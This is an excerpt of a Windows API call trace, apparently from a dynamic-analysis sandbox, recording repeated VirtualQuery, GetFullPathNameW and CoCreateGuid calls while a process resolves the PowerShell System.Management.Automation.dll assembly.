	[0379.446] VirtualQuery (in: lpAddress=0x14baa0, lpBuffer=0x14c960, dwLength=0x30 | out: lpBuffer=0x14c960*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.455] VirtualQuery (in: lpAddress=0x14ba10, lpBuffer=0x14c8d0, dwLength=0x30 | out: lpBuffer=0x14c8d0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0379.455] VirtualQuery (in: lpAddress=0x14baa0, lpBuffer=0x14c960, dwLength=0x30 | out: lpBuffer=0x14c960*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0379.455] VirtualQuery (in: lpAddress=0x14ba10, lpBuffer=0x14c8d0, dwLength=0x30 | out: lpBuffer=0x14c8d0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0379.455] VirtualQuery (in: lpAddress=0x14baa0, lpBuffer=0x14c960, dwLength=0x30 | out: lpBuffer=0x14c960*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0379.456] VirtualQuery (in: lpAddress=0x14b6e0, lpBuffer=0x14c5a0, dwLength=0x30 | out: lpBuffer=0x14c5a0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0379.456] VirtualQuery (in: lpAddress=0x14ba10, lpBuffer=0x14c8d0, dwLength=0x30 | out: lpBuffer=0x14c8d0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0379.456] VirtualQuery (in: lpAddress=0x14baa0, lpBuffer=0x14c960, dwLength=0x30 | out: lpBuffer=0x14c960*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0379.456] VirtualQuery (in: lpAddress=0x14ba10, lpBuffer=0x14c8d0, dwLength=0x30 | out: lpBuffer=0x14c8d0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0379.456] VirtualQuery (in: lpAddress=0x14baa0, lpBuffer=0x14c960, dwLength=0x30 | out: lpBuffer=0x14c960*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0379.456] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0x35834c1, Data2=0xc6ec, Data3=0x465b, Data4=([0]=0xbf, [1]=0x4e, [2]=0xb4, [3]=0xca, [4]=0x75, [5]=0xc4, [6]=0x43, [7]=0x7a))) returned 0x0
	[0379.456] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.456] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.457] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.457] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.457] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.457] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.457] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.457] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.457] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.457] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.457] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.458] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.458] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.458] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.458] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.458] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.458] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.458] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.458] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.458] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.458] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.458] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.459] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.459] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.459] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.459] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.459] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.459] VirtualQuery (in: lpAddress=0x14b2a0, lpBuffer=0x14c160, dwLength=0x30 | out: lpBuffer=0x14c160*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.459] VirtualQuery (in: lpAddress=0x14b330, lpBuffer=0x14c1f0, dwLength=0x30 | out: lpBuffer=0x14c1f0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.459] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c400, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.459] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.459] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.460] VirtualQuery (in: lpAddress=0x14b550, lpBuffer=0x14c410, dwLength=0x30 | out: lpBuffer=0x14c410*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0379.460] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c400, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.460] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.460] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.460] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0x50f09d82, Data2=0x7661, Data3=0x4788, Data4=([0]=0x92, [1]=0xa5, [2]=0x7e, [3]=0xab, [4]=0x79, [5]=0x25, [6]=0x2e, [7]=0x8d))) returned 0x0
	[0379.460] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.460] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.460] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.460] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.461] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.461] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.461] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.461] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.461] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.461] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0x15c6e214, Data2=0xb71e, Data3=0x461c, Data4=([0]=0x91, [1]=0x20, [2]=0x4e, [3]=0x3c, [4]=0x70, [5]=0xc3, [6]=0xf5, [7]=0x3b))) returned 0x0
	[0379.461] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.461] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.461] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.462] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.462] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.462] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.462] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0x335616b6, Data2=0xd75f, Data3=0x4cef, Data4=([0]=0x9a, [1]=0x28, [2]=0x1e, [3]=0xbc, [4]=0xf7, [5]=0xb7, [6]=0xda, [7]=0x6))) returned 0x0
	[0379.462] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.462] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.462] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.462] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.462] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.462] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.463] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0x91e70ee6, Data2=0xea56, Data3=0x4840, Data4=([0]=0xbd, [1]=0xb2, [2]=0x57, [3]=0xa4, [4]=0xe0, [5]=0x59, [6]=0xa8, [7]=0xa3))) returned 0x0
